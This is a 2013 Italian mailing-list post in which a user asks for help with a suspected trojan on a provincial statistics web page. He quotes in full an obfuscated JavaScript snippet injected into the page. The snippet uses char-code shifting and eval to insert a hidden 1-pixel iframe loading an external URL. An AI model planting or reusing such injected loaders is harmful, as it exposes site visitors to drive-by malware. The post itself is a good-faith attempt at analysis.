[Linuxtrent] risalire al contenuto di uno script javascript, compresso ?

• From: Marco Agostini <comunelevico@xxxxxxxxx>
• To: "linuxtrent@xxxxxxxxxxxxx" <linuxtrent@xxxxxxxxxxxxx>
• Date: Tue, 16 Apr 2013 11:05:22 +0200

Ciao, non so se la parola "compresso" sia esatta.

NB. non cliccate su nessun link che trovate sotto, almeno che non
stiate utilizzando Linux !

Il problema è questo, visitando il sito
http://www.statweb.provincia.tn.it/pubblicazioni/pop/PopTrentina2012.html
tramite un pc con Windows XP, l'antivirus NOD32 versione 5 blocca la
pagina segnalando la presenza di un trojan.

Ho dato un'occhiata al contenuto della pagina (da una macchina Linux)
e trovo un pezzo di codice javascript "sospetto":

<script type="text/javascript">asq=function(){return
n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(qwrbtwt){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x68,0x66,0x79,0x66,0x71,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x6d,0x70,0x64,0x62,0x6d,0x69,0x70,0x74,0x75,0x30,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x68,0x66,0x79,0x66,0x71,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x68,0x66,0x79,0x66,0x71,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x68,0x66,0x79,0x66,0x71,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x68,0x66,0x79,0x66,0x71,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c,0xe,0xb".split(",");h=2;s="";for(i=0;i-481!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;eval(""+s);}}}}</script>

NB. non cliccate sul link sotto se NON avete Linux !
provando a fare una ricerca in rete di "catch(qwrbtwt)" trovo diversi
siti che contengono lo script, tra cui questo:
http://www.google.it/interstitial?url=http://www.comune.fubine.al.it/

Google blocca il link riportato sopra (www.comune.funibe.al.it) e lo
segnala in questo modo "Avviso- se visiti questo sito il tuo computer
potrebbe subire danni!".

Quello che vorrei riuscire a capire è:
- si tratta di un falso positivo ?
- è possibile "decriptare" quanto contenuto nello script javascript
riportato sopra ?

grazie mille.
--
Per iscriversi  (o disiscriversi), basta spedire un  messaggio con OGGETTO
"subscribe" (o "unsubscribe") a mailto:linuxtrent-request@xxxxxxxxxxxxx

• Follow-Ups:
  • [Linuxtrent] Re: risalire al contenuto di uno script javascript, compresso ?
    • From: Lele Gaifax

Other related posts:

• » [Linuxtrent] risalire al contenuto di uno script javascript, compresso ? - Marco Agostini
• » [Linuxtrent] Re: risalire al contenuto di uno script javascript, compresso ?- Lele Gaifax
• » [Linuxtrent] Re: risalire al contenuto di uno script javascript, compresso ?- Marco Agostini
• » [Linuxtrent] Re: risalire al contenuto di uno script javascript, compresso ?- Alessandro Carloni
• » [Linuxtrent] Re: risalire al contenuto di uno script javascript, compresso ?- Mauro Colorio
• » [Linuxtrent] Re: risalire al contenuto di uno script javascript, compresso ?- Lele Gaifax
• » [Linuxtrent] Re: risalire al contenuto di uno script javascript, compresso ?- Marco Agostini
• » [Linuxtrent] Re: risalire al contenuto di uno script javascript, compresso ?- Mauro Colorio
• » [Linuxtrent] Re: risalire al contenuto di uno script javascript, compresso ?- Maurizio Napolitano

1. Home
2. linuxtrent
3. Archive
4. 04-2013

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---